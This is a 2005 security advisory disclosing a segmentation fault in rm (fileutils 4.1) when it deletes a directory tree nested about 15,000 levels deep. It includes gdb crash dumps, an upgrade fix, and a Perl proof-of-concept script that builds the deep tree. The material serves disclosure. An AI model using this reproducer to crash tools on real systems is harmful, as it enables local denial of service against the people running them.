Thu Aug 25 20:53:05 BRT 2005

Original advisory: http://nutshell.gotfault.net/papers/adv_rm.txt

Sumary:
rm gets SIGSEGV while trying to remove a very huge directory tree,
about 14986 sub-directories or more.

Bug discovered by nuTshell

Vulnerable versions:
rm (fileutils) 4.1 maybe lower or higher

Imune versions:
rm (coreutils) 5.2.1

Solution:
Upgrade to rm (coreutils) 5.2.1

While rm`ing a huge directory tree with about 14986 sub-directories we have
different behaviors adding a bit more dir-trees or taking off a bit more
dir-tree. In my system i`ve these two behaviors:

$ gdb -q /bin/rm
(no debugging symbols found)...(gdb)
(gdb) r -rf A
Starting program: /bin/rm -rf A
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0xb7e880dc in __lxstat64 () from /lib/libc.so.6
(gdb) i r
eax            0xbf711138       -1083109064
ecx            0x804d820        134535200
edx            0x0      0
ebx            0x0      0
esp            0xbf711000       0xbf711000
ebp            0xbf711088       0xbf711088
esi            0x809c1fb        134857211
edi            0x80a6c70        134900848
eip            0xb7e880dc       0xb7e880dc
eflags         0x10286  66182
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x20     32
ftag           0xffff   65535
fiseg          0x73     115
fioff          0x804b728        134526760
foseg          0x7b     123
fooff          0x804d828        134535208
fop            0x6d9    1753
mxcsr          0x1f80   8064
orig_eax       0xffffffff       -1
(gdb)

In other test i`ve got:

$ gdb -q /bin/rm
(no debugging symbols found)...(gdb)
(gdb) r -rf A
Starting program: /bin/rm -rf A
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x08049fc4 in strcpy ()
(gdb) i r
eax            0xbfaa5850       -1079355312
ecx            0x8051060        134549600
edx            0x0      0
ebx            0x0      0
esp            0xbf2a6000       0xbf2a6000
ebp            0xbf2a6118       0xbf2a6118
esi            0x809eb93        134867859
edi            0x80dfca8        135134376
eip            0x8049fc4        0x8049fc4
eflags         0x10283  66179
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x20     32
ftag           0xffff   65535
fiseg          0x73     115
fioff          0x804b728        134526760
foseg          0x7b     123
fooff          0x804d828        134535208
fop            0x6d9    1753
mxcsr          0x1f80   8064
orig_eax       0xffffffff       -1
(gdb)

Maybe it is possible to execute arbitrary code in special situations (local
or remote).
The code i have used to test these situations is attached below:

----- cut here -----
#!/usr/bin/perl
# Code that gets Segmentation fault from rm
# while trying to remove huge directory tree
# by nuTshell <http://nutshell.gotfault.net>

$end = shift or $end = 15;

mkdir("./Z") or die "Cannot create dir: $!\n";
system("/bin/rmdir ./Z") ;

$changing = 2045 / 5;
$dir2 = "A/"x$changing;

print "Wait while $0 create directory tree...\n";
for ($xix=0;$xix<36;$xix++) {
system ("mkdir -p $dir2");
chdir("$dir2");
}

$dir2 = "A/"x20;
for ($ipsilon=0;$ipsilon<$end;$ipsilon++) {
$xix++;
system ("mkdir -p $dir2");
chdir("$dir2");
}
print "Done, try rm -rf A\n";
#eof
---- cut here -----